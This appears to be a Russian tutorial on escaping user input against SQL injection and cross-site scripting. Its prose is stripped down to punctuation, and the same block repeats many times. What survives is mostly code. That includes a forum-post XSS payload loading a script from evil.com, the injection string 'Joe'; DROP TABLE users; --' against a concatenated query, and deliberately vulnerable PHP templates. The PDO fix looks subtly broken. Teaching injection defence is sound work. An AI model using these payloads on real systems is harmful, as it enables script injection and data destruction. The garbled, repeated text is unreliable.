<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
